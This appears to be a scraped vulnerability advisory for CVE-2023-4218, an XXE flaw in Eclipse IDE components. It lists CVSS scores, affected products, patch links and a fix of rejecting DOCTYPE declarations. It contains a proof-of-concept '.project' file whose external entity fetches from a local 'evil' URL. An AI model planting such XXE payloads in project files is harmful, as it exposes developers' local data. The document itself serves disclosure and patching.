CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
16.0%
xml files like “.project” are parsed vulnerable against all sorts of XXE attacks. The user just needs to open any evil project or update an open project with a vulnerable file (for example for review a foreign repository or patch).
Vulnerablility was found by static code analysis (SonarLint).
Example .project
file:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE price [
<!ENTITY xxe SYSTEM "http://127.0.0.1:49416/evil">]>
<projectDescription>
<name>p</name>
<comment>&xxe;</comment>
</projectDescription>
Similar patches including junit test that shows the vulnerability have already applied to PDE (see https://github.com/eclipse-pde/eclipse.pde/pull/667). A solution to platform should be the same: just reject parsing any XML that contains any DOCTYPE
.
No known workaround. User can only avoid to get/open any foreign files with eclipse. Firewall rules against loss of data (but not against XML bomb).
https://cwe.mitre.org/data/definitions/611.html
https://rules.sonarsource.com/java/RSPEC-2755
https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/8 (Report for multiple projects affected)
Vendor | Product | Version | CPE |
---|---|---|---|
org.eclipse.jdt | org.eclipse.jdt.ui | * | cpe:2.3:a:org.eclipse.jdt:org.eclipse.jdt.ui:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.urischeme | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.urischeme:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.ui.workbench | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.workbench:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.ui.ide | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.ide:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.ui.forms | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.ui.forms:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.jface | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.jface:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.platform | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.platform:*:*:*:*:*:*:*:* |
org.eclipse.platform | org.eclipse.core.runtime | * | cpe:2.3:a:org.eclipse.platform:org.eclipse.core.runtime:*:*:*:*:*:*:*:* |
github.com/advisories/GHSA-j24h-xcpc-9jw8
github.com/eclipse-cdt/cdt/commit/c7169b3186d2fef20f97467c3e2ad78e2943ed1b
github.com/eclipse-emf/org.eclipse.emf/issues/10
github.com/eclipse-jdt/eclipse.jdt.core/commit/38dd2a878f45cdb3d8d52090f1d6d1b532fd4c4d
github.com/eclipse-jdt/eclipse.jdt.ui/commit/13675b1f8a74f47de4da89ed0ded6af7c21dfbec
github.com/eclipse-pde/eclipse.pde/pull/632
github.com/eclipse-pde/eclipse.pde/pull/667
github.com/eclipse-platform/eclipse.platform.releng.buildtools/pull/45
github.com/eclipse-platform/eclipse.platform.swt/commit/bf71db5ddcb967c0863dad4745367b54f49e06ba
github.com/eclipse-platform/eclipse.platform.ui/commit/f243cf0a28785b89b7c50bf4e1cce48a917d89bd
github.com/eclipse-platform/eclipse.platform/commit/5dc372a0c5002b7f22e5d49eaa1cbf0916455daf
github.com/eclipse-platform/eclipse.platform/pull/761
github.com/eclipse-platform/eclipse.platform/security/advisories/GHSA-j24h-xcpc-9jw8
gitlab.eclipse.org/security/vulnerability-reports/-/issues/8
nvd.nist.gov/vuln/detail/CVE-2023-4218
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N
AI Score
Confidence
High
EPSS
Percentile
16.0%